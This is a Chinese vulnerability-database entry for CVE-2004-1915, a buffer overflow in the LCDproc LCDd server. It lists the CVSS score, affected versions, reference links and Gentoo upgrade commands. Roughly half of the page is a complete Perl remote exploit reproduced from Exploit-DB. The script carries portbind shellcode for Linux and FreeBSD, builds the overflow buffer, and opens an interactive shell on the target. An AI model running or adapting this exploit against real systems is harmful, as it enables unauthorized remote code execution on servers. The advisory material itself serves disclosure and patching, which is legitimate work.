CVE-2004-1915
CVSS7.5
发布时间 :2004-04-08 00:00:00
修订时间 :2016-10-17 23:02:53
NMCOE    

[原文]Buffer overflow in the parse_all_client_messages function in LCDproc 0.4.x up to 0.4.4 allows remote attackers to execute arbitrary code via a large number of arguments.


[CNNVD]LCDproc LCDd多个远程漏洞(CNNVD-200404-006)

        LCDproc 0.4.x到0.4.4版本的parse_all_client_messages函数存在缓冲区溢出漏洞。远程攻击者借助大量的参数执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:lcdproc:lcdproc:4.1
cpe:/a:lcdproc:lcdproc:0.4
cpe:/a:lcdproc:lcdproc:0.4.1_r1
cpe:/a:lcdproc:lcdproc:4.0
cpe:/a:lcdproc:lcdproc:0.3
cpe:/a:lcdproc:lcdproc:4.4
cpe:/a:lcdproc:lcdproc:4.3
cpe:/a:lcdproc:lcdproc:4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1915
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1915
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-006
(官方数据源) CNNVD

- 其它链接及资源

http://lists.omnipotent.net/pipermail/lcdproc/2004-April/008884.html
(VENDOR_ADVISORY)  CONFIRM  http://lists.omnipotent.net/pipermail/lcdproc/2004-April/008884.html
http://marc.info/?l=bugtraq&m=108145722229810&w=2
(UNKNOWN)  BUGTRAQ  20040408 PSR - #2004-001 Remote - LCDProc
http://security.gentoo.org/glsa/glsa-200404-19.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200404-19
http://www.securityfocus.com/bid/10085
(VENDOR_ADVISORY)  BID  10085
http://xforce.iss.net/xforce/xfdb/15803
(VENDOR_ADVISORY)  XF  lcdproc-parseallclientmessages-bo(15803)

- 漏洞信息

LCDproc LCDd多个远程漏洞
高危 缓冲区溢出
2004-04-08 00:00:00 2005-10-20 00:00:00
远程  
        LCDproc 0.4.x到0.4.4版本的parse_all_client_messages函数存在缓冲区溢出漏洞。远程攻击者借助大量的参数执行任意代码。
        

- 公告与补丁

        NOTE: It has been reported that the previously referenced fix was insufficient to resolve this issue.
        Gentoo has released updates to address this issue. These updates may be applied with the following commands:
        # emerge sync
        # emerge -pv ">=app-misc/lcdproc-0.4.5"
        # emerge ">=app-misc/lcdproc-0.4.5"
        The vendor has released an upgraded version of the software which is reported to deal with this issue completely:
        LCDProc LCDProc 4.4
        

- 漏洞信息 (23936)

LCDproc LCDd 0.x/4.x Multiple Remote Vulnerabilities (EDBID:23936)
linux remote
2004-04-08 Verified
0 wsxz
N/A [点击下载]
source: http://www.securityfocus.com/bid/10085/info

LCDproc Server (LCDd) has been reported to be prone to multiple remote vulnerabilities.

The first issue is reported to exist in the parse_all_client_messages() function of parse.c, and is due to a lack of sufficient boundary checks performed on user-supplied arguments. A remote attacker may exploit this vulnerability to execute arbitrary instructions in the context of the vulnerable service.

The second issue exists in the test_func_func() function of client_functions.c. Due to a lack of sufficient boundary checks an attacker may pass data to the function in a manner that is sufficient to trigger a buffer overflow. An attacker may leverage this condition to execute code in the context of the affected service.

Finally due the an erroneous implementation of a formatted print function contained in the test_func_func() function of client_functions.c.A remote attacker may supply format specifier characters. An attacker may leverage this condition to execute code in the context of the affected service. 

#!/usr/bin/perl
# Priv8security.com remote exploit for lcdproc server version 0.4.1 and lower.
#
#   Vendor Url: http://lcdproc.omnipotent.net/
#   Play with offset "-o" to get shell.
#
#   [wsxz@localhost wsxz]$ perl priv8lcd.pl -h localhost -t 0
#
#   -=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-
#
#   Connected!
#   [+] Using address: 0xbfffd904
#   [+] Checking version... Done!
#       Server is vuln :P
#   [+] Sending stuff... Done!
#   [+] Do we got a shell?
#   [+] Enjoy your stay on this server =)
#
#   ******  Welcome to 'localhost'  ******
#
#   Linux localhost.localdomain 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
#   i686 unknown unknown GNU/Linux
#   uid=503(wsxz) gid=503(wsxz) groups=503(wsxz),13(news)
#
################################################################################

use IO::Socket;
use Getopt::Std; getopts('h:p:t:o:', \%args);


if (defined($args{'h'})) { $host   = $args{'h'}; }
if (defined($args{'p'})) { $port   = $args{'p'}; }else{$port = 13666;}
if (defined($args{'t'})) { $system = $args{'t'}; }
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

print "\n-=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-\n\n";
if(!defined($host)){
print "Usage:
        -h <host>
	-p port <default 13666>
	-t target:
	    0 - linux
	    1 - freebsd
	-o <offset>\n\n";
exit(1);
}

#Priv8 portbind shellcode by Ramon de Carvalho
$shellinux =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a".
"\x02\x89\xe1\xb0\x66\xcd\x80\xff".
"\x49\x02\x6a\x10\x51\x50\x89\xe1".
"\x43\xb0\x66\xcd\x80\x89\x41\x04".
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0".
"\x66\xcd\x80\x59\x93\xb0\x3f\xcd".
"\x80\x49\x79\xf9\x68\x2f\x2f\x73".
"\x68\x68\x2f\x62\x69\x6e\x89\xe3".
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
#Priv8 portbind shellcode by Ramon de Carvalho
$shellfree =
"\x31\xc0\x50\x6a\x01\x6a\x02\x89".
"\xe7\x50\xb0\x61\xcd\x80\xff\x4f".
"\x02\x6a\x10\x57\x50\x50\xb0\x68".
"\xcd\x80\x89\x47\xf4\xb0\x6a\xcd".
"\x80\xb0\x1e\xcd\x80\x50\x50\xb0".
"\x5a\xcd\x80\xff\x4f\xec\x79\xf7".
"\x50\x68\x2f\x2f\x73\x68\x68\x2f".
"\x62\x69\x6e\x89\xe3\x50\x54\x53".
"\x50\xb0\x3b\xcd\x80";

if ($system == 1 ){#freebsd buffer
  $ret = 0xbfbfde58;
  $shellcode = $shellfree;
}

if ($system == 0){#linux buffer
  $ret = 0xbfffd658;
  $shellcode = $shellinux;
}

  $new_ret = pack('l', ($ret + $offset));
  $buffer .= "\x90" x (1322 - length($shellcode));
  $buffer .= $shellcode;
  $buffer .= $new_ret x 10;

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] Cant connect\n";

  print "Connected!\n";
  print "[+] Using address: 0x", sprintf('%lx',($ret)), "\n";
  print STDERR "[+] Checking version...";
  print $sock "hello\n";
  $awser = <$sock>;

    if($awser =~ /0.4.3/ || $awser =~ /0.4.4/  ){
      print STDERR " Done!\n";
      print STDERR "[-] The server is not vuln.\n";
      exit(1);
    }
  print STDERR " Done!\n";
  print STDERR "    Server is vuln :P\n";
  print STDERR "[+] Sending stuff... ";
  sleep(2);
  print $sock "$buffer\n";
  print STDERR "Done!\n";
  print "[+] Do we got a shell?\n";

  sleep(3);

$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>65535,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try other offset next time ok.\n";

  print "[+] Enjoy your stay on this server =)\n";

  $sc->autoflush(1);
  print $sc "echo;echo \"******  Welcome to '`hostname`'  ******\"\n";
  print $sc "echo;uname -a;id;echo\n";

  die "cant fork: $!" unless defined($pid = fork());

  if ($pid) {
      while(defined ($line = <$sc>)) {
          print STDOUT $line;
      }
      kill("TERM", $pid);
  }
  else
  {
      while(defined ($line = <STDIN>)) {
          print $sc $line;
      }
  }
  close($sc);
  print "Good bye!!\n";



		

- 漏洞信息

5158
LCDProc parse_all_client_messages() Function Multiple Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站